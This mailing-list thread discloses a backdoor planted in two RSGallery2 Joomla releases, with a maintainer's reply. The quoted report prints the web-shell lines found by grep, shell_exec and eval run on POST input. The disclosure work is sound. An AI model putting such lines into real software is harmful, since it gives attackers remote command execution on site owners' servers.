Re: Backdoor in com_rsgallery2 gallery extension for joomla

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Someone broke into one of the JoomlaCode project admin accounts and uploaded the two tainted components.  SVN and other components (including tar.bz2 of the same releases) were not touched.

We've locked down the accounts and removed all component releases while investigating.  Thanks for bringing this to our attention.

Jonah

Jan van Niekerk wrote:
> Software:
> 	RSGallery2 - Gallery Extension for Joomla!
> 	We are currently working on a new website. All files are still available at 
> 	the JoomlaCode project page.
> 
> Severity:
> 	Not a big deal.  Joomla components contain all sorts of obfuscated junk all 
> 	the time.  Who cares what it does?
> 
> URLs:
> http://rsgallery2.net/
> http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
> http://joomlacode.org/gf/download/frsrelease/7791/36662/com_rsgallery2_2.0.0b1.zip
> 
> Joomlacode.org says, about these releases:
> 	RSGallery2 1.14.3 Security Release
> 	Jonah Braun
> 	2008-02-13
> 	This is an updated production alpha containing a low threat security fix. If 
> 	you use commenting you should upgrade. An option to show/hide the Search box 	
> 	has also been added. See the official site for downloads and support: 
> 	http://rsgallery2.net/
> 
> 	RSGallery2 2.0.0b1 released
> 	John Caprez
> 	2008-06-23
> 	This is the first version of RSGallery2 that runs in Joomla 1.5 native mode.
>  
> 	Special thanks goes to all the translators providing the updated language 
> 	files and the testers of the nightly builds.
>  	Download it and enjoy. Feel free to report any bugs or problems in the forum 
> 	at the RSGallery2 main web site 
> 
> Vendor notified:
>   I tried.  Not very hard though.  joomlacode doesn't seem to have a security 
>   contact and links to joomla.org as if they are the same crowd.  I'm sending 
>   a BCC to the given address for Jonah Braun though.  I'll send it to bugtraq, 
>   and they will sit on it for a few hours.
>   http://developer.joomla.org/security.html
>       Huh?  Do I need more coffee, or does this page say to contact them using 
>       the details at this page?  So you do that, and it says ... no wait, 
>       infloop.  Oh wait, there is a contact form.  Filled something in.  Blah.
> 
> Vulnerability:
> 
> % wget \
> http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
> 
> % unzip com_rsgallery2_legacy_1.14.3.zip
> 
> % egrep -r '(eval|exec).*POST' .
> 
> ./language/english-utf8.php:                $result = 
> shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
> ./language/english-utf8.php:            $result = shell_exec($_POST['cmd'] . " 
> 2>&1");
> ./includes/rsgallery.class.php:$out = execute($_POST['cmd']);
> ./includes/rsgallery.class.php:eval($_POST['php']);
> ./includes/rsgallery.class.php:$out = execute($_POST['alias']);
> 
> There's other fun obfuscated javascript hiding in 'eval's'.
> 
> Ditto version 2
> 
> nuf sed  &:-)
> 
> 

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